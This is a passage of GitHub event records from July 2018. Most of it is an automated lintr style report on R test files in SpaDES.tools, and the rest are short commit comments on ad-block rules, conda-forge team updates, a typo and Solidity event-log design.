^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c02ae99a19f76daa9e95d5d372cd7f955c564c45/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-05T22:01:28Z"}
{"id":"7925786584","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"easylist/easylistgermany"},"payload":{"comment":{"id":29614280,"position":null,"line":null,"path":null,"commit_id":"6f9747889f8caa385a8ef78e4992bc9ede6fa159","created_at":"2018-07-05T22:01:33Z","updated_at":"2018-07-05T22:01:33Z","author_association":"NONE","body":"That breaks all kind of stuff, for example the captcha needed to register.\r\nhttps://i.imgur.com/Oxf99ps.jpg"}},"created_at":"2018-07-05T22:01:33Z"}
{"id":"7925787186","type":"CommitCommentEvent","actor":{"login":"Fayza97"},"repo":{"name":"Fayza97/Resturantt"},"payload":{"comment":{"id":29614286,"position":null,"line":null,"path":null,"commit_id":"3e8f890a86e3d21502d0b6b05f31a2f7f56459cd","created_at":"2018-07-05T22:01:42Z","updated_at":"2018-07-05T22:01:42Z","author_association":"OWNER","body":"this is my fully copy of my project you can download the full\r\nfiles here hope you liked "}},"created_at":"2018-07-05T22:01:42Z"}
{"id":"7925787798","type":"CommitCommentEvent","actor":{"login":"benortiz"},"repo":{"name":"bluebottlecoffee/style"},"payload":{"comment":{"id":29614288,"position":null,"line":null,"path":null,"commit_id":"2e0774b37bba536154da80d727e652932939812f","created_at":"2018-07-05T22:01:51Z","updated_at":"2018-07-05T22:01:51Z","author_association":"CONTRIBUTOR","body":"o no"}},"created_at":"2018-07-05T22:01:51Z"}
{"id":"7925788039","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/krb5-feedstock"},"payload":{"comment":{"id":29614291,"position":null,"line":null,"path":null,"commit_id":"c781dc734ea4c30381fca5ad902608e2207a879c","created_at":"2018-07-05T22:01:54Z","updated_at":"2018-07-05T22:01:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T22:01:54Z"}
{"id":"7925789255","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29614297,"position":4,"line":850,"path":"examples/nek5000/bp1.usr","commit_id":"98673630a9bb84f2ad3cf3f4fba9a97fa3794ea2","created_at":"2018-07-05T22:02:15Z","updated_at":"2018-07-05T22:02:15Z","author_association":"MEMBER","body":"`vec_qata` should have been `vec_qdata`"}},"created_at":"2018-07-05T22:02:15Z"}
{"id":"7925792190","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614309,"position":19,"line":17,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T22:03:07Z","updated_at":"2018-07-05T22:03:07Z","author_association":"NONE","body":"Style guide - Try to make these event logs such that they could be used to reconstruct the state history of the contract (in theory) by any interested client. Generally, this will be the important inputs, not the results as you're doing with balances. Important inputs also include msg.sender and msg.value if it's important. \r\n\r\nEvents are really important for user interfaces that \"watch\" event logs. \r\n\r\nConsider \r\n```\r\nevent LogSplit(address from, address receiver1, address receiver2, uint amount);\r\n```\r\nI did not include the amount of the split or anyone's balance because I know those things are easily inferred. But I could, at extra gas cost, for debugging purposes. In any case, such a log would provide an audit trail to explain how the balances got the way they are. "}},"created_at":"2018-07-05T22:03:07Z"}
{"id":"7925794778","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614312,"position":21,"line":19,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T22:03:52Z","updated_at":"2018-07-05T22:03:52Z","author_association":"NONE","body":"Probably who threw the switch matters, so `event LogPause(address sender);`"}},"created_at":"2018-07-05T22:03:52Z"}
